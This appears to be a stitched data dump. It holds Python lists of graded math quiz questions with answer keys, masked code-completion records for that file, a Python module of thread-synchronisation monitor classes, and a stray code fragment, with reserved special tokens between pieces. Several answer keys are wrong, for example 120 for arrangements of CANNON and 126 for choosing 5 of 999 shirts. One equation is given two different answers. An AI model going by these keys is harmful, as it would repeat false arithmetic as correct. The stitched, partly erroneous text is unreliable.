'x = √\u200b81 - √\u200b64; x= ?', 1], [
'y = √\u200b16 * √\u200b4 / √\u200b9; y=?', 2], [
'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [
'How many unique ways are there to arrange the letters in the word CANNON?'
, 120], [
'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',
23], ['y=−4x+6; \u200b3x+4y=-2 ; x=?', 2], [
'−x+4y=−9; \u200by=−2x-9; y=?', -3]]
Hard = [[
'Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?'
, 20], [
'You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?'
, 10], [
'Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?'
, 126], [
'How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?',
67], [
"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?"
, 12], [
"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?"
, 2], ['y−3=2(x+1); x= -2, y=?', 48], [
'How many unique ways are there to arrange the letters in the word CANNON?'
, 120], [
'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',
23], ['−x+4y=−9; \u200by=−2x-9; y=?', -3], [
'x = √\u200b81 - √\u200b64; x= ?', 1], [
'y = √\u200b16 * √\u200b4 / √\u200b9; y=?', 2], [
'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [
'y=−4x+6; \u200b3x+4y=-2 ; x=?', 2], ['−x+4y=−9; \u200by=−2x-9; y=?', -3]]
<|reserved_special_token_1|>
Easy = [["4 + 12 = ?", 16],
["45 -34 = ?", 11],
["27 + 12 -18 = ?", 21],
['25 - 5 * 4 = ?', 5],
["18 + 45 / 5 - 3 * 2 = ?", 21],
["5! = ?", 120],
["3! + 2! = ?", 8],
["7 + 5! / 4! - 6 / 3 = ?", 10],
["(25 + 5) / 6 * 4 = ?", 20],
["4(3+c)+c=c+4; c=?", -2],
["√121 = ?" ,11],
["x = √81 - √64; x= ?", 1],
["x + y = 20; x - y = 4; y = ?", 8]]
Normal = [["8(10−k)=2k; k = ?", 8],
["−4n−8=4(−3n+2); n=?", 2],
["4(3+c)+c=c+4; c=?", -2],
["√121 = ?" ,11],
["x = √81 - √64; x= ?", 1],
["y = √16 * √4 / √9; y=?", 2],
["y−3=2(x+1); x= -2, y=?", 1],
[" y*y = 4x/5 − 11; y= 5, x = ?", 45],
["How many unique ways are there to arrange the letters in the word CANNON?", 120],
["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
["y=−4x+6; 3x+4y=-2 ; x=?", 2],
["−x+4y=−9; y=−2x-9; y=?", -3]]
Hard = [["Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?", 20],
["You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?", 10],
["Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?", 126],
["How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?" ,67],
["You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 12],
["You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 2],
["y−3=2(x+1); x= -2, y=?", 48],
["How many unique ways are there to arrange the letters in the word CANNON?", 120],
["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
["−x+4y=−9; y=−2x-9; y=?", -3],
["x = √81 - √64; x= ?", 1],
["y = √16 * √4 / √9; y=?", 2],
["y−3=2(x+1); x= -2, y=?", 1],
[" y*y = 4x/5 − 11; y= 5, x = ?", 45],
["y=−4x+6; 3x+4y=-2 ; x=?", 2],
["−x+4y=−9; y=−2x-9; y=?", -3]]
|
flexible
|
{
"blob_id": "66edf0d2f7e25e166563bdb1063a1ed45ecda0e6",
"index": 541,
"step-1": "<mask token>\n",
"step-2": "Easy = [['4 + 12 = ?', 16], ['45 -34 = ?', 11], ['27 + 12 -18 = ?', 21], [\n '25 - 5 * 4 = ?', 5], ['18 + 45 / 5 - 3 * 2 = ?', 21], ['5! = ?', 120],\n ['3! + 2! = ?', 8], ['7 + 5! / 4! - 6 / 3 = ?', 10], [\n '(25 + 5) / 6 * 4 = ?', 20], ['4(3+c)+c=c+4; c=?', -2], [\n '\\u200b√\\u200b121 = ?', 11], ['x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'x + y = 20; x - y = 4; y = ?', 8]]\nNormal = [['8(10−k)=2k; k = ?', 8], ['−4n−8=4(−3n+2); n=?', 2], [\n '4(3+c)+c=c+4; c=?', -2], ['\\u200b√\\u200b121 = ?', 11], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], [\n '−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\nHard = [[\n 'Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?'\n , 20], [\n 'You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?'\n , 10], [\n 'Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?'\n , 126], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?',\n 67], [\n \"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 12], [\n \"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 2], ['y−3=2(x+1); x= -2, y=?', 48], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\n",
"step-3": "Easy = [[\"4 + 12 = ?\", 16],\r\n [\"45 -34 = ?\", 11],\r\n [\"27 + 12 -18 = ?\", 21],\r\n ['25 - 5 * 4 = ?', 5],\r\n [\"18 + 45 / 5 - 3 * 2 = ?\", 21],\r\n [\"5! = ?\", 120],\r\n [\"3! + 2! = ?\", 8],\r\n [\"7 + 5! / 4! - 6 / 3 = ?\", 10],\r\n [\"(25 + 5) / 6 * 4 = ?\", 20],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"x + y = 20; x - y = 4; y = ?\", 8]]\r\n\r\nNormal = [[\"8(10−k)=2k; k = ?\", 8],\r\n [\"−4n−8=4(−3n+2); n=?\", 2],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n\r\nHard = [[\"Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?\", 20],\r\n [\"You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?\", 10],\r\n [\"Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?\", 126],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?\" ,67],\r\n [\"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 12],\r\n [\"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 48],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import collections
import copy
import threading
import typing as tp
from ..decorators.decorators import wraps
from ..typing import K, V, T
class Monitor:
"""
Base utility class for creating monitors (the synchronization thingies!)
These are NOT re-entrant!
Use it like that:
>>> class MyProtectedObject(Monitor):
>>> def __init__(self, *args, **kwargs):
>>> Monitor.__init__(self)
>>> ... do your job ..
>>> @Monitor.synchronized
>>> def function_that_needs_mutual_exclusion(self):
>>> .. do your threadsafe jobs ..
>>> def function_that_partially_needs_protection(self):
>>> .. do your jobs ..
>>> with Monitor.acquire(self):
>>> .. do your threadsafe jobs ..
>>> .. do your jobs ..
>>> with self:
>>> .. do your threadsafe jobs ..
"""
def __enter__(self) -> 'Monitor':
self._monitor_lock.acquire()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> bool:
self._monitor_lock.release()
return False
def __init__(self):
"""You need to invoke this at your constructor
You can also use it to release locks of other objects."""
self._monitor_lock = threading.Lock() # type: threading.Lock
@staticmethod
def synchronize_on_attribute(attr_name: str):
"""
When a Monitor is an attribute of a class, and you have a method instance
that you would like secure by acquiring that monitor, use this.
The first argument taken by that method instance must be self.
:param attr_name: name of the attribute that is the monitor
"""
def outer(fun):
@wraps(fun)
def method(self, *args, **kwargs):
# noinspection PyProtectedMember
with getattr(self, attr_name)._monitor_lock:
return fun(self, *args, **kwargs)
return method
return outer
@staticmethod
def synchronized(fun: tp.Callable) -> tp.Callable:
"""
This is a decorator. Class method decorated with that will lock the
global lock of given instance, making it threadsafe. Depending on
usage pattern of your class and it's data semantics, your performance
may vary
"""
@wraps(fun)
def monitored(*args, **kwargs):
# noinspection PyProtectedMember
with args[0]._monitor_lock:
return fun(*args, **kwargs)
return monitored
class release:
"""
Returns a context manager object that can release another object
as long as that object is a monitor.
Consider foo, which is a monitor. You have a protected function,
but you feel that you can release it for a while as it would
improve parallelism. You can use it as such:
>>> @Monitor.synchronized
>>> def protected_function(self):
>>> .. do some stuff that needs mutual exclusion ..
>>> with Monitor.release(self):
>>> .. do some I/O that does not need mutual exclusion ..
>>> .. back to protected stuff ..
"""
__slots__ = ('foo',)
def __init__(self, foo: 'Monitor'):
self.foo = foo
def __enter__(self) -> None:
# noinspection PyProtectedMember
self.foo._monitor_lock.release()
def __exit__(self, e1, e2, e3) -> bool:
# noinspection PyProtectedMember
self.foo._monitor_lock.acquire()
return False
class acquire:
"""
Returns a context manager object that can lock another object,
as long as that object is a monitor.
Consider foo, which is a monitor. If you needed to lock it from
outside, you would do:
>>> with Monitor.acquire(foo):
>>> .. do operations on foo that need mutual exclusion ..
"""
__slots__ = ('foo',)
def __init__(self, foo: 'Monitor'):
self.foo = foo
def __enter__(self) -> None:
# noinspection PyProtectedMember
self.foo._monitor_lock.acquire()
def __exit__(self, e1, e2, e3) -> bool:
# noinspection PyProtectedMember
self.foo._monitor_lock.release()
return False
@classmethod
def synchronize_on(cls, monitor: 'Monitor') -> tp.Callable[[tp.Callable], tp.Callable]:
"""
A decorator for locking on non-self Monitor objects
Use it like:
>>> class MasterClass(Monitor):
>>> def get_object(self):
>>> class SlaveClass:
>>> @Monitor.synchronize_on(self)
>>> def get_object(self2):
>>> ...
>>> return SlaveClass
"""
def outer(fun):
@wraps(fun)
def inner(*args, **kwargs):
with cls.acquire(monitor):
return fun(*args, **kwargs)
return inner
return outer
class RMonitor(Monitor):
"""
Monitor, but using an reentrant lock instead of a normal one
"""
def __init__(self):
self._monitor_lock = threading.RLock() # type: threading.RLock
class MonitorList(tp.Generic[T], collections.UserList, Monitor):
"""
A list that is also a monitor.
Note that access to it's properties is not automatically synchronized, you got to
invoke the monitor to implement an opportunistic locking of your own choice
"""
def __init__(self, *args):
collections.UserList.__init__(self, *args)
Monitor.__init__(self)
def __copy__(self) -> 'MonitorList':
return MonitorList(copy.copy(self.data))
def __deepcopy__(self, memo) -> 'MonitorList':
return MonitorList(copy.deepcopy(self.data, memo=memo))
def __getitem__(self, item: tp.Union[slice, int]) -> T:
return self.data[item]
def __setitem__(self, key: int, value: T) -> None:
self.data[key] = value
def __delitem__(self, key: tp.Union[slice, int]) -> None:
del self.data[key]
class MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):
"""
A dict that is also a monitor.
Note that access to it's properties is not automatically synchronized, you got to
invoke the monitor to implement an opportunistic locking of your own choice
"""
def __init__(self, *args, **kwargs):
collections.UserDict.__init__(self, *args, **kwargs)
Monitor.__init__(self)
def __getitem__(self, item: K) -> V:
return self.data[item]
def __setitem__(self, key: K, value: V) -> None:
self.data[key] = value
def __delitem__(self, key: K) -> None:
del self.data[key]
def __copy__(self) -> 'MonitorDict':
return MonitorDict(copy.copy(self.data))
def __deepcopy__(self, memo) -> 'MonitorDict':
return MonitorDict(copy.deepcopy(self.data, memo=memo))
class MonitorSet(set, Monitor):
"""
A set that allows atomic insert-if-not-already-there operation
"""
def __init__(self, *args):
super().__init__(*args)
Monitor.__init__(self)
def insert_and_check(self, item) -> bool:
"""
Perform an atomic insert if not already in set
:param item: item to insert
:return: whether the item was successfully inserted
"""
with Monitor.acquire(self):
if item in self:
return False
self.add(item)
return True
|
normal
|
{
"blob_id": "0528d7761cbbf3dbe881ff05b81060f3d97e7f6c",
"index": 742,
"step-1": "<mask token>\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n <mask token>\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n <mask token>\n <mask token>\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-2": "<mask token>\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) ->'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-3": "<mask token>\n\n\nclass RMonitor(Monitor):\n <mask token>\n\n def __init__(self):\n self._monitor_lock = threading.RLock()\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) ->'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-4": "<mask token>\n\n\nclass RMonitor(Monitor):\n \"\"\"\n Monitor, but using an reentrant lock instead of a normal one\n \"\"\"\n\n def __init__(self):\n self._monitor_lock = threading.RLock()\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) ->'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-5": "import collections\nimport copy\nimport threading\nimport typing as tp\n\nfrom ..decorators.decorators import wraps\n\nfrom ..typing import K, V, T\n\n\nclass Monitor:\n \"\"\"\n Base utility class for creating monitors (the synchronization thingies!)\n\n These are NOT re-entrant!\n\n Use it like that:\n\n >>> class MyProtectedObject(Monitor):\n >>> def __init__(self, *args, **kwargs):\n >>> Monitor.__init__(self)\n >>> ... do your job ..\n\n >>> @Monitor.synchronized\n >>> def function_that_needs_mutual_exclusion(self):\n >>> .. do your threadsafe jobs ..\n\n >>> def function_that_partially_needs_protection(self):\n >>> .. do your jobs ..\n >>> with Monitor.acquire(self):\n >>> .. do your threadsafe jobs ..\n >>> .. do your jobs ..\n >>> with self:\n >>> .. do your threadsafe jobs ..\n \"\"\"\n\n def __enter__(self) -> 'Monitor':\n self._monitor_lock.acquire()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb) -> bool:\n self._monitor_lock.release()\n return False\n\n def __init__(self):\n \"\"\"You need to invoke this at your constructor\n You can also use it to release locks of other objects.\"\"\"\n self._monitor_lock = threading.Lock() # type: threading.Lock\n\n @staticmethod\n def synchronize_on_attribute(attr_name: str):\n \"\"\"\n When a Monitor is an attribute of a class, and you have a method instance\n that you would like secure by acquiring that monitor, use this.\n\n The first argument taken by that method instance must be self.\n\n :param attr_name: name of the attribute that is the monitor\n \"\"\"\n\n def outer(fun):\n @wraps(fun)\n def method(self, *args, **kwargs):\n # noinspection PyProtectedMember\n with getattr(self, attr_name)._monitor_lock:\n return fun(self, *args, **kwargs)\n\n return method\n\n return outer\n\n @staticmethod\n def synchronized(fun: tp.Callable) -> tp.Callable:\n \"\"\"\n This is a decorator. Class method decorated with that will lock the\n global lock of given instance, making it threadsafe. Depending on\n usage pattern of your class and it's data semantics, your performance\n may vary\n \"\"\"\n\n @wraps(fun)\n def monitored(*args, **kwargs):\n # noinspection PyProtectedMember\n with args[0]._monitor_lock:\n return fun(*args, **kwargs)\n\n return monitored\n\n class release:\n \"\"\"\n Returns a context manager object that can release another object\n as long as that object is a monitor.\n\n Consider foo, which is a monitor. You have a protected function,\n but you feel that you can release it for a while as it would\n improve parallelism. You can use it as such:\n\n >>> @Monitor.synchronized\n >>> def protected_function(self):\n >>> .. do some stuff that needs mutual exclusion ..\n >>> with Monitor.release(self):\n >>> .. do some I/O that does not need mutual exclusion ..\n >>> .. back to protected stuff ..\n \"\"\"\n __slots__ = ('foo',)\n\n def __init__(self, foo: 'Monitor'):\n self.foo = foo\n\n def __enter__(self) -> None:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.release()\n\n def __exit__(self, e1, e2, e3) -> bool:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.acquire()\n return False\n\n class acquire:\n \"\"\"\n Returns a context manager object that can lock another object,\n as long as that object is a monitor.\n\n Consider foo, which is a monitor. If you needed to lock it from\n outside, you would do:\n\n >>> with Monitor.acquire(foo):\n >>> .. do operations on foo that need mutual exclusion ..\n \"\"\"\n __slots__ = ('foo',)\n\n def __init__(self, foo: 'Monitor'):\n self.foo = foo\n\n def __enter__(self) -> None:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.acquire()\n\n def __exit__(self, e1, e2, e3) -> bool:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.release()\n return False\n\n @classmethod\n def synchronize_on(cls, monitor: 'Monitor') -> tp.Callable[[tp.Callable], tp.Callable]:\n \"\"\"\n A decorator for locking on non-self Monitor objects\n\n Use it like:\n\n >>> class MasterClass(Monitor):\n >>> def get_object(self):\n >>> class SlaveClass:\n >>> @Monitor.synchronize_on(self)\n >>> def get_object(self2):\n >>> ...\n >>> return SlaveClass\n \"\"\"\n\n def outer(fun):\n @wraps(fun)\n def inner(*args, **kwargs):\n with cls.acquire(monitor):\n return fun(*args, **kwargs)\n\n return inner\n\n return outer\n\n\nclass RMonitor(Monitor):\n \"\"\"\n Monitor, but using an reentrant lock instead of a normal one\n \"\"\"\n\n def __init__(self):\n self._monitor_lock = threading.RLock() # type: threading.RLock\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) -> 'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) -> 'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) -> T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) -> None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) -> None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) -> V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) -> None:\n self.data[key] = value\n\n def __delitem__(self, key: K) -> None:\n del self.data[key]\n\n def __copy__(self) -> 'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) -> 'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) -> bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-ids": [
17,
20,
22,
23,
33
]
}
|
[
17,
20,
22,
23,
33
] |
<|reserved_special_token_0|>
class AjaxableResponseMixin:
